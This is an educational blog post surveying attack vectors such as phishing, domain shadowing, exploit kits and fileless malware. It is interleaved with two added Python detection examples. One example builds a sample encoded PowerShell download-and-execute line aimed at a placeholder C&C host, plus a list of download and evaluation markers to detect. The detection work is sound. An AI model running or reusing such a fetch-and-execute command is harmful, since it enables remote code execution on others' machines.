
Risks and attack vectors

Shiju John

Updated: Sep 10, 2019

Risk can be defined as the effect of uncertainty on objectives. The different types of risk that could arise are:


1. Financial risk.

2. Technical risk.

3. Management risk.

4. Security risk.


An attacker tries to disrupt the financial, technical and management balance of the organization in order to expose its security vulnerabilities.


The common attack vectors (Metivier, B.) are:

a. Phishing: Using an email disguised as a legitimate message, hackers entice the recipient either to open an infected attachment or to click a link that takes them to an infected website. The goal is to lure individuals into giving up sensitive data, such as personally identifiable information, banking and credit card numbers, and passwords.


b. Malware: Malware, short for “malicious software,” is software (or a script or code) designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems and mobile devices. Malware is a tool of choice for hackers because it is effective, easy to use, and readily available.


c. Drive-by Download: In this type of attack, malware is downloaded from a legitimate site that has been compromised, without any deliberate action by the user. This can happen when the end user visits a website, views an email message, or clicks on a deceptive pop-up window (message). It typically takes advantage of vulnerabilities in the user’s operating system or other programs.


d. Distributed Denial of Service (DDoS): A DDoS attack aims to make a machine (a server or even a desktop) or a network resource such as a switch, hub or router unavailable for its intended use. It either consumes more resources than the device can handle or disrupts it by disabling communication services. In this type of attack the targeted machine is flooded with an enormous number of requests, thereby overloading the system and preventing the device from serving the legitimate requests that need to be fulfilled on priority. This attack targets the Availability property of the CIA triad.


e. Domain Shadowing: First the hacker obtains domain registrar credentials through a successful attack, usually phishing. This allows them to add host records to an organization’s DNS zone and point those records at their malicious IPs.

For example, let's say you've determined that you will never worry about traffic to "somelocalcompany.com," and you whitelist the domain. They fall victim to domain shadowing, and now you may have traffic going to "somemalicioushostinrussia.somelocalcompany.com" and not even notice it. So much for whitelisting by domain! Your systems are headed out to Russia to pick up some nasty code!
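The whitelisting pitfall described above can be shown concretely. The following is an added example, not code from the original post or from Metivier's article: it assumes a per-domain allowlist, a constructed baseline of previously seen hosts, and constructed proxy log lines in the form "timestamp client hostname". It shows why a suffix-based allowlist passes the shadow host, and it adds the check a defender actually wants: flag any hostname under an allowlisted domain that has never been observed before.

```python
"""Domain shadowing versus per-domain allowlists (added example, not from the post).

Two pieces: (1) the naive allowlist check that lets any host under
"somelocalcompany.com" through, and (2) a first-seen check that surfaces
hostnames under an allowlisted domain that were never observed before.
All hostnames, the baseline and the log lines are constructed samples.
"""

ALLOWLIST = {"somelocalcompany.com"}

# Hosts observed before the incident (constructed baseline).
KNOWN_HOSTS = {
    "somelocalcompany.com",
    "www.somelocalcompany.com",
    "mail.somelocalcompany.com",
}

# Constructed proxy log lines: "<timestamp> <client> <hostname>".
PROXY_LOG = """\
2019-09-10T08:01:12Z 10.0.0.21 www.somelocalcompany.com
2019-09-10T08:02:44Z 10.0.0.22 mail.somelocalcompany.com
2019-09-10T08:03:09Z 10.0.0.23 somemalicioushostinrussia.somelocalcompany.com
2019-09-10T08:04:51Z 10.0.0.24 updates.example.net
"""


def registered_domain(hostname: str) -> str:
    """Return the last two labels of a hostname ('a.b.c.com' -> 'c.com').

    Assumption: two-label registrable domains.  A real deployment should use
    the Public Suffix List so that 'x.co.uk' is not reduced to 'co.uk'.
    """
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def allowed_by_domain(hostname: str) -> bool:
    """Naive allowlist: any host under an allowlisted domain passes.

    This is the behaviour the post warns about: a host record the attacker
    added with stolen registrar credentials inherits the parent's trust.
    """
    return registered_domain(hostname) in ALLOWLIST


def first_seen_shadow_hosts(log_text: str, known_hosts: set) -> list:
    """Return hostnames that sit under an allowlisted domain and were never
    seen before.  These are the candidates for a domain-shadowing review."""
    flagged = []
    seen = set(known_hosts)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash the scan
        host = parts[2].lower()
        if allowed_by_domain(host) and host not in seen:
            flagged.append(host)
        seen.add(host)
    return flagged


if __name__ == "__main__":
    print("naive allowlist passes shadow host:",
          allowed_by_domain("somemalicioushostinrussia.somelocalcompany.com"))
    print("first-seen hosts under allowlisted domains:",
          first_seen_shadow_hosts(PROXY_LOG, KNOWN_HOSTS))
```

The first-seen check is deliberately simple: it needs nothing more than a baseline of hostnames already observed, and it turns a silent allowlist pass into a reviewable event. The same idea applies to DNS query logs, which also show the newly added host record being resolved for the first time.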


f. Malvertising: These are online ads controlled by cybercriminals. Malicious software is downloaded onto the user’s system when they click the infected ad, which can appear on any site, even popular ones. Users are often redirected to an exploit kit landing page, and the exploit kit can load malware onto the system without user consent. Often the victim is unaware that anything suspicious happened.

g. Windows Macros: Macros are code embedded within another program to automate repetitive tasks. Hiding malicious macros inside Microsoft Office documents, such as Word files, used to be the prevailing technique for launching attacks. Although Microsoft has since added security features that greatly reduce the effectiveness of macro-based malware, the technique is still in use. The malware is installed when the recipient opens the infected document.


h. Exploit Kits: An exploit kit is attacker-controlled software that runs on or resides on a web server. Its purpose is to identify technical vulnerabilities in the visiting system and take advantage of the weak spots it finds. It is a tool that hackers use to break in, like picking a lock. Once it has gained a foothold, the kit uploads and executes a variety of malicious code. Exploit kits are sold in cyber-criminal circles, often with exploits for known vulnerabilities already loaded, and are extremely easy to use.


i. Fileless malware: Fileless malware is not really fileless; it just is not an executable file (.exe). When you are compromised using this technique, there is no malicious program sitting on your PC. It operates by using legitimate programs, typically PowerShell, for malicious purposes. A malicious encoded script can be decoded by PowerShell and then reach out to a command and control (C&C) server without writing any files to the local hard drive.
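Because the encoded script never touches disk, the place to catch it is process-creation telemetry, which still records the full PowerShell command line. The following is an added example, not code from the original post: it assumes log lines of the form "host user command-line", constructs its own sample script and Base64-encodes it the way PowerShell's -EncodedCommand expects (Base64 over UTF-16LE text), then decodes any encoded payload it finds and checks it for the download and evaluation primitives a script would use to reach a C&C server.

```python
"""Decoding encoded PowerShell from process-creation logs (added example,
not from the post).  Log lines, the sample script and the marker list are
constructed; the C&C address uses the reserved .invalid TLD as a placeholder.
"""
import base64
import re

# Constructed list of PowerShell primitives a script uses to fetch and run
# remote content.  Extend it for your environment.
NETWORK_MARKERS = ("Net.WebClient", "DownloadString", "Invoke-WebRequest",
                   "Invoke-Expression", "IEX")

# Constructed sample payload and its encoded form.  PowerShell decodes the
# -EncodedCommand argument as Base64 over UTF-16LE text.
_SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/a')"
_SAMPLE_ENCODED = base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation log lines: "<host> <user> <command line>".
PROCESS_LOG = f"""\
WS01 alice powershell.exe -NoProfile -File C:\\scripts\\backup.ps1
WS02 bob powershell.exe -nop -w hidden -EncodedCommand {_SAMPLE_ENCODED}
WS03 carol notepad.exe C:\\Users\\carol\\notes.txt
"""

# Accept the documented switch and its common abbreviations, longest first so
# "-e" does not swallow the others.  Whitespace after the switch is required,
# so "-ExecutionPolicy" does not match.
_ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                       re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded
    PowerShell payload, else None.  Invalid Base64 counts as no payload."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_network_markers(script: str) -> list:
    """Return the markers from NETWORK_MARKERS present in the decoded script."""
    lowered = script.lower()
    return [mk for mk in NETWORK_MARKERS if mk.lower() in lowered]


def scan_process_log(log_text: str) -> list:
    """Return (host, user, markers, decoded_script) for every PowerShell
    command line whose encoded payload contains a network marker."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) != 3 or "powershell" not in parts[2].lower():
            continue
        script = decode_encoded_command(parts[2])
        if script is None:
            continue
        markers = find_network_markers(script)
        if markers:
            hits.append((parts[0], parts[1], markers, script))
    return hits


if __name__ == "__main__":
    for host, user, markers, script in scan_process_log(PROCESS_LOG):
        print(f"{host} {user}: {markers}\n    {script}")
```

The decode step is what matters: matching on the presence of "-EncodedCommand" alone produces noise from legitimate automation, whereas matching on what the decoded text does (downloads content and evaluates it) is the signal the post describes. In production the same logic sits over Sysmon event 1 or Windows Security event 4688 with command-line logging enabled.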


References

Metivier, B. (n.d.). Threat Hunting: Common Attack Vectors and Delivery Channels. Retrieved from https://www.sagedatasecurity.com/blog/threat-hunting-common-attack-vectors-and-delivery-channels


Guedez, A. (2018, May 02). Attack vectors in cybersecurity: All you need to know to expel them out from your digital environments. Retrieved from https://www.gb-advisors.com/attack-vectors-in-cybersecurity/

